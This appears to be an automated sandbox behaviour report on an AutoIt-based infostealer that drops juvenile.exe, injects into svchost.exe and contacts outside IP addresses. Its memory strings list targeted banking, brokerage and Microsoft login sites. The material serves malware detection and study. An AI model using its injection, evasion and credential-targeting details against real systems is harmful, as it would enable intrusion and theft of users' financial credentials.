Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595108	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594994	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594670	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594555	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594399	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594280	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594170	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594061	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598696	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598587	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597483	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595817	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595599	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595331	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 593828	Jump to behavior

Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: wscript.exe, 00000009.00000002.1426570215.0000019F6CCA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: FACT0987789000900.exe, 00000003.00000003.1277930574.000000000145E000.00000004.00000020.00020000.00000000.sdmp, FACT0987789000900.exe, 00000003.00000002.1300545312.000000000145E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QeMu6j
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: juvenile.exe, 00000006.00000002.1321786442.0000000001611000.00000004.00000020.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1299065276.000000000155B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QeMu6
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: juvenile.exe, 0000000A.00000003.1426648043.000000000137D000.00000004.00000020.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000002.1448248183.000000000137D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QeMu6;
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: svchost.exe, 0000000B.00000002.2546214590.000000000366B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltes>
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: svchost.exe, 00000008.00000002.2545842926.000000000326B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: wscript.exe, 00000009.00000002.1426570215.0000019F6CCA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\O
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\Desktop\FACT0987789000900.exe	API call chain: ExitProcess graph end node	graph_3-93460
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 8_2_09239578 LdrInitializeThunk,

8_2_09239578

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004E6AAF BlockInput,

3_2_004E6AAF

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_00493D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

3_2_00493D19

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004C3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

3_2_004C3920

Source: C:\Windows\SysWOW64\svchost.exe

8_2_004019F0

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004AE01E LoadLibraryA,GetProcAddress,

3_2_004AE01E

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_0134A060 mov eax, dword ptr fs:[00000030h]	3_2_0134A060
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_0134A0C0 mov eax, dword ptr fs:[00000030h]	3_2_0134A0C0
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_01348A10 mov eax, dword ptr fs:[00000030h]	3_2_01348A10
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_01568640 mov eax, dword ptr fs:[00000030h]	6_2_01568640
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_01569CF0 mov eax, dword ptr fs:[00000030h]	6_2_01569CF0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_01569C90 mov eax, dword ptr fs:[00000030h]	6_2_01569C90
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 10_2_01264128 mov eax, dword ptr fs:[00000030h]	10_2_01264128
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 10_2_01265778 mov eax, dword ptr fs:[00000030h]	10_2_01265778
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 10_2_012657D8 mov eax, dword ptr fs:[00000030h]	10_2_012657D8

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004CA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

3_2_004CA66C

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004B8189 SetUnhandledExceptionFilter,	3_2_004B8189
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004B81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_004B81AC
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008F8189 SetUnhandledExceptionFilter,	6_2_008F8189
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008F81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_008F81AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004123F1 SetUnhandledExceptionFilter,	8_2_004123F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_004123F1 SetUnhandledExceptionFilter,	11_2_004123F1

Source: C:\Windows\SysWOW64\svchost.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 188.114.96.3 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 132.226.247.73 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EE8008			Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 30D4008			Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004CB106 LogonUserW,

3_2_004CB106

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_00493D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

3_2_00493D19

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004D411C SendInput,keybd_event,

3_2_004D411C

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004D74E7 mouse_event,

3_2_004D74E7

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FACT0987789000900.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe

3_2_004CA66C

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004D71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

3_2_004D71FA

Source: FACT0987789000900.exe, juvenile.exe	Binary or memory string: Shell_TrayWnd
Source: FACT0987789000900.exe, 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmp, juvenile.exe, 00000006.00000002.1320568116.000000000097E000.00000040.00000001.01000000.00000005.sdmp, juvenile.exe, 0000000A.00000002.1447557851.000000000097E000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004B65C4 cpuid

3_2_004B65C4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,		8_2_00417A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,		11_2_00417A20

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
